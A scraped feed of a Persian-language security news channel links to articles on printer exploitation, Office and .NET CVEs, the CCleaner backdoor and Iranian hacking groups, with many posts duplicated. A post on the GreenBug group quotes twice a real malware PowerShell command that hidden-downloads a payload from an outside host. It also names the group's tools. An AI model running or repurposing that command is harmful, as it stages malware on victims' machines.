توضیحی در مورد نحوه هک کردن پرینترها
https://0x00sec.org/t/an-introduction-to-printer-exploitation-1/3565
#printer
#network
#nmap
#smb
#shodan
@sec_nerd
https://0x00sec.org/t/an-introduction-to-printer-exploitation-1/3565
#printer
#network
#nmap
#smb
#shodan
@sec_nerd
0x00sec - The Home of the Hacker
An Introduction to Printer Exploitation
> Preface Note: As always the following is just a digest of all the things I could observe by working on printers myself or facts from stuff I read about recently. Since this thread about the HP printer promo videos caught some attention I will try to shed…
پلاگین decoder برای افزایش قابلیت های دکدینگ Burp suite
https://github.com/nccgroup/Decoder-Improved
#burpsuite
#decoder
#jar
@sec_nerd
https://github.com/nccgroup/Decoder-Improved
#burpsuite
#decoder
#jar
@sec_nerd
Exploiting CVE-2017-8759: SOAP WSDL Parser Code Injection
https://www.mdsec.co.uk/2017/09/exploiting-cve-2017-8759-soap-wsdl-parser-code-injection/
#xml
#wsdl
@sec_nerd
https://www.mdsec.co.uk/2017/09/exploiting-cve-2017-8759-soap-wsdl-parser-code-injection/
#xml
#wsdl
@sec_nerd
MDSec
Exploiting CVE-2017-8759: SOAP WSDL Parser Code Injection - MDSec
Introduction CVE-2017-8759, the vulnerability recently discovered by FireEye as being exploited in the wild is a code injection vulnerability that occurs in the .NET framework when parsing a WSDL using...
امنیت اطلاعات
دیتابیس سایت امریکایی equifax برای فروش در دارکنت قرار داده شده! قیمت : 600 بیت کوین! #news #breach #equifax
حل مسائل فیزیک در لینوکس
https://www.linuxjournal.com/content/solving-physics-problems-linux
#linux
#calculation
@sec_nerd
https://www.linuxjournal.com/content/solving-physics-problems-linux
#linux
#calculation
@sec_nerd
سایت clearsky در گزارشی، توضیحاتی در مورد فعالیت های گروه ایرانی GreenBug ارائه کرد.این گروه از تروجانی به نام ISMAgent برای آلوده کردن سیستمها استفاده میکنند.ابزار مورد استفاده در این حملات از آسیب پذیری آفیس با کد CVE-2017-0199 استفاده کرده که توضیحات بیشتری در مورد این باگ در https://github.com/bhdresh/CVE-2017-0199 به همراه ابزار مورد نیاز موجود هست. این حمله با فراخوانی ظاهری فایلی به اسم template.rtf و اجرای دستور:
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nologo -WindowStyle Hidden $webClient = New-Object https://System.Net .WebClient; $val = $webClient.DownloadString(‘https://a.pomf[.]cat/ntluca.txt ‘); add-content -path ‘C:\Users\USER\AppData\Roaming/srvRep.txt’ -value $val -force
در پشت صحنه فایل ntluca.txt رو که فایل اصلی این حمله هست دانلود و دکد میکنه (base64 digital certificate) .
توضیحات بیشتر :
https://www.clearskysec.com/ismagent/
#iran
#usa
#ksa
#israel
#russia
#malware
#windows
#greenbug
@sec_nerd
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nologo -WindowStyle Hidden $webClient = New-Object https://System.Net .WebClient; $val = $webClient.DownloadString(‘https://a.pomf[.]cat/ntluca.txt ‘); add-content -path ‘C:\Users\USER\AppData\Roaming/srvRep.txt’ -value $val -force
در پشت صحنه فایل ntluca.txt رو که فایل اصلی این حمله هست دانلود و دکد میکنه (base64 digital certificate) .
توضیحات بیشتر :
https://www.clearskysec.com/ismagent/
#iran
#usa
#ksa
#israel
#russia
#malware
#windows
#greenbug
@sec_nerd
GitHub
GitHub - bhdresh/CVE-2017-0199: Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security…
Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a maliciou...
معرفی گروه هکرهای ایرانی CopyKittens
این گروه که در سال 2013 فعالیت خودش رو شروع کرده بیشتر بر روی اهداف خارجی تمرکز داره و تابه حال اهدافی از اسرائیل،عربستان،ترکیه،امریکا،اردن و آلمان و بعضاً کارمندان سازمان ملل رو مورد نفوذ قرار داده. اهداف معمولا شامل مراکز دولتی(مانند وزارت خارجه)ُ مراکز علمی، کمپانی های جنگی،شرکت های طرف قرارداد وزارت جنگ و شرکت های بزرگ IT بوده اند.
روش مورد استفاده معمولا با پایه ریزی حمله از یک حساب هک شده متعلق به مکانی مورد اعتماد مثل وزارت خارجه شروع شده و هکرها سعی داشتند با انتشار داکیومنت آلوده از طریق ایمیل، اهداف رو در سازمان های دولتی دیگر مورد نفوذ قرار بدن. به عنوان مثال با سرقت یک داکیومنت از وزارت خارجه ترکیه به عنوان تله (decoy) از اون استفاده میشده. در این حملات سفارت های اسراییل در نقاط مختلف و همچنین وزارت خارجه این رژیم مورد نفوذ قرار گرفته.
این گروه از بدافزارهای تولیدی خودشان به همراه ابزارهای پابلیک استفاده میکنند که در لیست زیر میبینید:
TDTESS backdoor
Vminst (ابزاری برای حرکت در شبکه - lateral movement)
NetSrv (لود کننده Cobalt strike)
ZPP (برنامه فشرده سازی)
Matryoshka (بدافزار ساخت این گروه)
سایر ابزارها :
metasploit
mimikatz
Empire
havij,acunetix,sqlmap
زیرساخت های مورد استفاده در حملات این گروه معمولا از کشورهای روسیه و هلند بوده و برای نفوذها، وبسایتها رو هم مورد حمله قرار میدادند.
توضیحات بیشتر :
https://www.clearskysec.com/tulip/
#iran
#usa
#ksa
#israel
#russia
#malware
#copykittens
این گروه که در سال 2013 فعالیت خودش رو شروع کرده بیشتر بر روی اهداف خارجی تمرکز داره و تابه حال اهدافی از اسرائیل،عربستان،ترکیه،امریکا،اردن و آلمان و بعضاً کارمندان سازمان ملل رو مورد نفوذ قرار داده. اهداف معمولا شامل مراکز دولتی(مانند وزارت خارجه)ُ مراکز علمی، کمپانی های جنگی،شرکت های طرف قرارداد وزارت جنگ و شرکت های بزرگ IT بوده اند.
روش مورد استفاده معمولا با پایه ریزی حمله از یک حساب هک شده متعلق به مکانی مورد اعتماد مثل وزارت خارجه شروع شده و هکرها سعی داشتند با انتشار داکیومنت آلوده از طریق ایمیل، اهداف رو در سازمان های دولتی دیگر مورد نفوذ قرار بدن. به عنوان مثال با سرقت یک داکیومنت از وزارت خارجه ترکیه به عنوان تله (decoy) از اون استفاده میشده. در این حملات سفارت های اسراییل در نقاط مختلف و همچنین وزارت خارجه این رژیم مورد نفوذ قرار گرفته.
این گروه از بدافزارهای تولیدی خودشان به همراه ابزارهای پابلیک استفاده میکنند که در لیست زیر میبینید:
TDTESS backdoor
Vminst (ابزاری برای حرکت در شبکه - lateral movement)
NetSrv (لود کننده Cobalt strike)
ZPP (برنامه فشرده سازی)
Matryoshka (بدافزار ساخت این گروه)
سایر ابزارها :
metasploit
mimikatz
Empire
havij,acunetix,sqlmap
زیرساخت های مورد استفاده در حملات این گروه معمولا از کشورهای روسیه و هلند بوده و برای نفوذها، وبسایتها رو هم مورد حمله قرار میدادند.
توضیحات بیشتر :
https://www.clearskysec.com/tulip/
#iran
#usa
#ksa
#israel
#russia
#malware
#copykittens
مانیتورینگ فعالیت های کاربران و دستورات اجرا شده توسط آنها در سیستم عامل لینوکس
https://www.tecmint.com/monitor-linux-commands-executed-by-system-users-in-real-time/
#linux
#administration
#security
https://www.tecmint.com/monitor-linux-commands-executed-by-system-users-in-real-time/
#linux
#administration
#security
هکرها نسخه ۵.۳۳ برنامه ccleaner رو از سرور این برنامه آلوده به بکدور کردند. اگر از این نسخه استفاده میکنید شما هم قربانی این حمله هستید.
این برنامه میلیونها کاربر در سراسر جهان داره.
https://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
#news
#ccleaner
#backdoor
#malware
@sec_nerd
این برنامه میلیونها کاربر در سراسر جهان داره.
https://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
#news
#ccleaner
#backdoor
#malware
@sec_nerd
Cisco Talos Blog
CCleanup: A Vast Number of Machines at Risk
Update 9/18: CCleaner Cloud version 1.07.3191 is also reported to be affected
Update 9/19: This issue was discovered and reported by both Morphisec and Cisco in separate in-field cases and reported separately to Avast.
Update 9/19: There has been some confusion…
Update 9/19: This issue was discovered and reported by both Morphisec and Cisco in separate in-field cases and reported separately to Avast.
Update 9/19: There has been some confusion…
Run Linux or other Operating Systems in your browser !
https://bellard.org/jslinux/
#js
#linux
#vm
@sec_nerd
https://bellard.org/jslinux/
#js
#linux
#vm
@sec_nerd
وب سایت piratebay به عنوان یکی از ارائه دهندگان خدمات تورنت و جستجوی فایل های تورنت در دنیا مشهور هست.
این وب سایت اخیرا در فوتر صفحه از اسکریپت جاوایی استفاده میکنه که با اون قادر هست از CPU سیستم بازدید کنندگان برای ماین کردن بیت کوین استفاده کنه.
اطلاعات بیشتر:
https://torrentfreak.com/the-pirate-bay-website-runs-a-cryptocurrency-miner-170916/
#torrent
#btc
#miner
#js
#fraud
#piratebay
@sec_nerd
این وب سایت اخیرا در فوتر صفحه از اسکریپت جاوایی استفاده میکنه که با اون قادر هست از CPU سیستم بازدید کنندگان برای ماین کردن بیت کوین استفاده کنه.
اطلاعات بیشتر:
https://torrentfreak.com/the-pirate-bay-website-runs-a-cryptocurrency-miner-170916/
#torrent
#btc
#miner
#js
#fraud
#piratebay
@sec_nerd
Torrentfreak
The Pirate Bay Website Runs a Cryptocurrency Miner (Updated) * TorrentFreak
A few hours ago a cryptocurrency miner appeared on The Pirate Bay website, using the computer resources of visitors to mine Monero coins. The operators of The Pirate Bay are testing it as a new way to generate revenue, but many users aren't happy.
burplay
اکستنشن برنامه burpsuite برای تشخیص باگ های Privilege Escalation
https://github.com/SpiderLabs/burplay
#burpsuite
#privilege_escalation
#pentest
#web
@sec_nerd
اکستنشن برنامه burpsuite برای تشخیص باگ های Privilege Escalation
https://github.com/SpiderLabs/burplay
#burpsuite
#privilege_escalation
#pentest
#web
@sec_nerd
GitHub
GitHub - SpiderLabs/burplay: Burplay is a Burp Extension allowing for replaying any number of requests using same modifications…
Burplay is a Burp Extension allowing for replaying any number of requests using same modifications definition. Its main purpose is to aid in searching for Privilege Escalation issues. - SpiderLabs/...
آگهی استخدام یک بانک در لندن برای توسعه دهنده جاوا اسکریپت حرفه ای:
حقوق بیش از ۱۰۰ هزار پوند در سال + مزایای ویژه
https://www.redcat-digital.com/job/javascript-banking-london-up-to-100000/
#job
#js
@sec_nerd
حقوق بیش از ۱۰۰ هزار پوند در سال + مزایای ویژه
https://www.redcat-digital.com/job/javascript-banking-london-up-to-100000/
#job
#js
@sec_nerd
فایل تمرین باگ apache struts2
https://pentesterlab.com/exercises/s2-052
#apache
#struts2
#java
#equifax
@sec_nerd
https://pentesterlab.com/exercises/s2-052
#apache
#struts2
#java
#equifax
@sec_nerd
Pentesterlab
PentesterLab: S2-052
This course explains how to gain code execution when a Struts application is vulnerable to s2-052. It's crucial to understand this vulnerability due to its widespread exploitation and potential for worm-like propagation.
امنیت اطلاعات
SSH Pivoting using Meterpreter https://www.hackingarticles.in/ssh-pivoting-using-meterpreter/ #ssh #linux #pivoting #msf #shell
SSH e Meterpeter pivoting
https://www.homelab.it/index.php/2016/04/21/metasploit-ssh-meterpeter-pivoting/
#ssh
#linux
#msf
#pivoting
#network
@sec_nerd
https://www.homelab.it/index.php/2016/04/21/metasploit-ssh-meterpeter-pivoting/
#ssh
#linux
#msf
#pivoting
#network
@sec_nerd
HomeLab IT
SSH e Meterpeter pivoting
Nell’articolo di oggi tratterò un argomento fondamentale nel penetration testing, ovvero la tecnica “Pivoting“.
Pivoting in italiano può essere tradotto come “fare perno”, infatti questa tecnica si basa sullo sfruttamento di un sistema compromesso per attaccarne…
Pivoting in italiano può essere tradotto come “fare perno”, infatti questa tecnica si basa sullo sfruttamento di un sistema compromesso per attaccarne…